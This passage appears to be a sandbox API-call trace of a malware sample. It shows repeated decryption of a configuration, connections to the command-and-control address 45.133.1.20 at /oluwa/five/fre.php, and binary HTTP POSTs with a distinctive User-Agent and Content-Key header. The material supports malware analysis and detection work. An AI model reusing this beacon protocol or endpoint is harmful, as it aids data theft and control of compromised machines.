phKey=0x19fcac*=0x6ad4e0) returned 1 [0315.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.523] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.525] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.525] GetProcessHeap () returned 0x6a0000 [0315.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0315.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.527] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0315.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.528] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0315.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.529] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0315.529] GetProcessHeap () returned 0x6a0000 [0315.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.530] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0315.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.532] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0315.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.533] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0315.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.535] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0315.535] GetProcessHeap () returned 0x6a0000 [0315.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0315.535] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0315.535] GetProcessHeap () returned 0x6a0000 [0315.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0315.535] socket (af=2, type=1, protocol=6) returned 0xc1c [0315.535] connect (s=0xc1c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0315.564] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0315.564] GetProcessHeap () returned 0x6a0000 [0315.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0315.564] GetProcessHeap () returned 0x6a0000 [0315.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0315.565] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.566] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0315.566] GetProcessHeap () returned 0x6a0000 [0315.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfe68 [0315.566] GetProcessHeap () returned 0x6a0000 [0315.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.567] GetProcessHeap () returned 0x6a0000 [0315.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0315.567] GetProcessHeap () returned 0x6a0000 [0315.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0315.568] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.570] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0315.570] GetProcessHeap () returned 0x6a0000 [0315.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0315.570] GetProcessHeap () returned 0x6a0000 [0315.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.570] send (s=0xc1c, buf=0x6bd460*, len=242, flags=0) returned 242 [0315.581] send (s=0xc1c, buf=0x6bb998*, len=159, flags=0) returned 159 [0315.581] GetProcessHeap () returned 0x6a0000 [0315.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0315.582] recv (in: s=0xc1c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0315.653] GetProcessHeap () returned 0x6a0000 [0315.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0315.654] GetProcessHeap () returned 0x6a0000 [0315.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0315.656] GetProcessHeap () returned 0x6a0000 [0315.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfe68 | out: hHeap=0x6a0000) returned 1 [0315.656] GetProcessHeap () returned 0x6a0000 [0315.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0315.657] closesocket (s=0xc1c) returned 0 [0315.657] GetProcessHeap () returned 0x6a0000 [0315.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0315.657] GetProcessHeap () returned 0x6a0000 [0315.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.658] GetProcessHeap () returned 0x6a0000 [0315.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0315.659] GetProcessHeap () returned 0x6a0000 [0315.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0315.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1978) returned 0xc1c [0315.661] Sleep (dwMilliseconds=0xea60) [0315.663] GetProcessHeap () returned 0x6a0000 [0315.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0315.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.677] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0315.736] GetProcessHeap () returned 0x6a0000 [0315.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c70a8 [0315.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.737] CryptImportKey (in: hProv=0x6befd0, pbData=0x6c70a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0315.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.738] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.739] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.740] GetProcessHeap () returned 0x6a0000 [0315.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c70a8 | out: hHeap=0x6a0000) returned 1 [0315.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.741] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0315.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.742] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0315.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.842] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0315.842] GetProcessHeap () returned 0x6a0000 [0315.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.845] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.848] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.850] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.851] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.851] GetProcessHeap () returned 0x6a0000 [0315.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0315.886] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.887] GetProcessHeap () returned 0x6a0000 [0315.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0315.888] GetProcessHeap () returned 0x6a0000 [0315.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.888] GetProcessHeap () returned 0x6a0000 [0315.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0315.890] GetProcessHeap () returned 0x6a0000 [0315.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0315.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.892] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0315.910] GetProcessHeap () returned 0x6a0000 [0315.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0315.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.913] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0315.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.914] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.915] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.915] GetProcessHeap () returned 0x6a0000 [0315.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0315.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.917] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0315.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.918] CryptDestroyKey (hKey=0x6ad020) returned 1 [0315.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.919] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0315.919] GetProcessHeap () returned 0x6a0000 [0315.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.920] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0315.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.921] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0315.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.922] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0315.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.924] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0315.924] GetProcessHeap () returned 0x6a0000 [0315.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0315.924] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0315.924] GetProcessHeap () returned 0x6a0000 [0315.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0315.924] socket (af=2, type=1, protocol=6) returned 0xc20 [0315.925] connect (s=0xc20, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0315.949] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0315.949] GetProcessHeap () returned 0x6a0000 [0315.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0315.949] GetProcessHeap () returned 0x6a0000 [0315.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0315.950] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.951] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0315.951] GetProcessHeap () returned 0x6a0000 [0315.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfce8 [0315.952] GetProcessHeap () returned 0x6a0000 [0315.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.953] GetProcessHeap () returned 0x6a0000 [0315.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0315.953] GetProcessHeap () returned 0x6a0000 [0315.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0315.956] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.957] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0315.957] GetProcessHeap () returned 0x6a0000 [0315.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0315.957] GetProcessHeap () returned 0x6a0000 [0315.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.958] send (s=0xc20, buf=0x6bd460*, len=242, flags=0) returned 242 [0315.959] send (s=0xc20, buf=0x6bb998*, len=159, flags=0) returned 159 [0315.959] GetProcessHeap () returned 0x6a0000 [0315.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0315.959] recv (in: s=0xc20, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0316.040] GetProcessHeap () returned 0x6a0000 [0316.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0316.041] GetProcessHeap () returned 0x6a0000 [0316.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0316.044] GetProcessHeap () returned 0x6a0000 [0316.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfce8 | out: hHeap=0x6a0000) returned 1 [0316.045] GetProcessHeap () returned 0x6a0000 [0316.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0316.045] closesocket (s=0xc20) returned 0 [0316.046] GetProcessHeap () returned 0x6a0000 [0316.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0316.046] GetProcessHeap () returned 0x6a0000 [0316.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.048] GetProcessHeap () returned 0x6a0000 [0316.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0316.048] GetProcessHeap () returned 0x6a0000 [0316.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0316.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x197c) returned 0xc20 [0316.051] Sleep (dwMilliseconds=0xea60) [0316.053] GetProcessHeap () returned 0x6a0000 [0316.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0316.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0316.103] GetProcessHeap () returned 0x6a0000 [0316.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0316.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.104] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0316.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.107] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.108] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.108] GetProcessHeap () returned 0x6a0000 [0316.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0316.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.110] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0316.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.112] CryptDestroyKey (hKey=0x6ad060) returned 1 [0316.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.134] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0316.134] GetProcessHeap () returned 0x6a0000 [0316.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0316.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.135] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.137] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.138] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.139] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.140] GetProcessHeap () returned 0x6a0000 [0316.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0316.140] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.140] GetProcessHeap () returned 0x6a0000 [0316.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0316.141] GetProcessHeap () returned 0x6a0000 [0316.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0316.142] GetProcessHeap () returned 0x6a0000 [0316.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0316.143] GetProcessHeap () returned 0x6a0000 [0316.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0316.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.144] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0316.162] GetProcessHeap () returned 0x6a0000 [0316.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0316.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.163] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0316.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.165] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.167] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.167] GetProcessHeap () returned 0x6a0000 [0316.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0316.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.169] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0316.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.170] CryptDestroyKey 